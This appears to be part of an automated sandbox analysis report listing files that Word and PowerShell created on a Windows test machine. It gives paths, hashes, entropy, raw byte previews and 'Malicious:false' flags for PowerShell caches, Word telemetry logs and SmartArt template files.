                                                                                                                                              SHA-256:0CFF7E7EF21F5D6DB5595C4780263292D66C8D06BEF0A017365B965290538941
                                                                                                                                              SHA-512:992D509F160755BD0089C65D22B4D9A793062CFDD0D1E4E103C6AB78704643D14B4A5B690273FC884373877BC86644762209FB7564E3237BC8A9349D85794F68
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..L.i.s.t. .o.f. . . .& & & & & & & & ....e.r.r.o.r.......E.r.r.o.r..... . . . . . . . . . . . . . . . . . . . .3. .4.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.....................................................................................................................................................................................................................................................................................................................................................................................6...8...:...F...H...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):11608
                                                                                                                                              Entropy (8bit):4.8908305915084105
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                                                                                              MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                                                                                              SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                                                                                              SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                                                                                              SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):64
                                                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Nlllul3nqth:NllUa
                                                                                                                                              MD5:851531B4FD612B0BC7891B3F401A478F
                                                                                                                                              SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                                                                                              SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                                                                                              SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:@...e.................................&..............@..........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1734546399932238900_2BA691F3-DD03-4420-8E31-8A7F68564263.log

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):20971520
                                                                                                                                              Entropy (8bit):0.017936896165067547
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:GWTs0uR6sn5aF/WSs8DKBj2BT/6VhobOFjG5VjsD7wLBZ:35
                                                                                                                                              MD5:173168EF1FD780F483DB0D56EA8CB14A
                                                                                                                                              SHA1:263FD093E7DFA06C2673673C96F7B339A531B0D3
                                                                                                                                              SHA-256:2FDFE9189DCEEE4816407328E7642F4D536C078282885E9BDD2754537799EB89
                                                                                                                                              SHA-512:BC6033474CE9ABE785C20CBE7D006081AB85F9394EDFD58A180C4DA1DD43CCC23FBC82070765200F23F4F5BC007178A6833EC7D7638E3F184EA7ADEA1E3F8CA4
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/18/2024 18:26:40.226.WINWORD (0x1BD0).0x288.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":22,"Time":"2024-12-18T18:26:40.226Z","Contract":"Office.System.Activity","Activity.CV":"85GmKwPdIESOMYp/aFZCYw.7.1","Activity.Duration":302,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...12/18/2024 18:26:40.257.WINWORD (0x1BD0).0x288.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-12-18T18:26:40.257Z","Contract":"Office.System.Activity","Activity.CV":"85GmKwPdIESOMYp/aFZCYw.7","Activity.Duration":35578,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureDi

                                                                                                                                              C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1734546399932801800_2BA691F3-DD03-4420-8E31-8A7F68564263.log

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):20971520
                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3::
                                                                                                                                              MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                                              SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                                              SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                                                              SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD67E8.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):260
                                                                                                                                              Entropy (8bit):3.4895685222798054
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                                                                                                                              MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                                                                                                                              SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                                                                                                                              SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                                                                                                                              SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD67E8.tmp\VaryingWidthList.glox

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3075
                                                                                                                                              Entropy (8bit):7.716021191059687
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                                              MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                                              SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                                              SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                                              SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD67E9.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):242
                                                                                                                                              Entropy (8bit):3.4938093034530917
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                                                                                                                              MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                                                                                                                              SHA1:BA15D036D522978409846EA682A1D7778381266F
                                                                                                                                              SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                                                                                                                              SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD67E9.tmp\TabList.glox

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4888
                                                                                                                                              Entropy (8bit):7.8636569313247335
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                                              MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                                              SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                                              SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                                              SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD67F9.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):252
                                                                                                                                              Entropy (8bit):3.4680595384446202
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                                                                                                                              MD5:D79B5DE6D93AC06005761D88783B3EE6
                                                                                                                                              SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                                                                                                                              SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                                                                                                                              SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD67F9.tmp\architecture.glox

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5783
                                                                                                                                              Entropy (8bit):7.88616857639663
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                                              MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                                              SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                                              SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                                              SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD682A.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):246
                                                                                                                                              Entropy (8bit):3.5039994158393686
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                                                                                                                                              MD5:16711B951E1130126E240A6E4CC2E382
                                                                                                                                              SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                                                                                                                              SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                                                                                                                              SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD682A.tmp\TabbedArc.glox

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3683
                                                                                                                                              Entropy (8bit):7.772039166640107
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                                              MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                                              SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                                              SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                                                                              SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD682B.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):252
                                                                                                                                              Entropy (8bit):3.48087342759872
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                                                                                                                              MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                                                                                                                              SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                                                                                                                              SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                                                                                                                              SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD682B.tmp\PictureFrame.glox

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4326
                                                                                                                                              Entropy (8bit):7.821066198539098
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                                              MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                                              SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                                              SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                                              SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6872.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):264
                                                                                                                                              Entropy (8bit):3.4866056878458096
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                                                                                                                                              MD5:6C489D45F3B56845E68BE07EA804C698
                                                                                                                                              SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                                                                                                                              SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                                                                                                                              SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6872.tmp\ThemePictureAccent.glox

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6448
                                                                                                                                              Entropy (8bit):7.897260397307811
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                                              MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                                              SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                                              SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                                              SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                                              Malicious:false
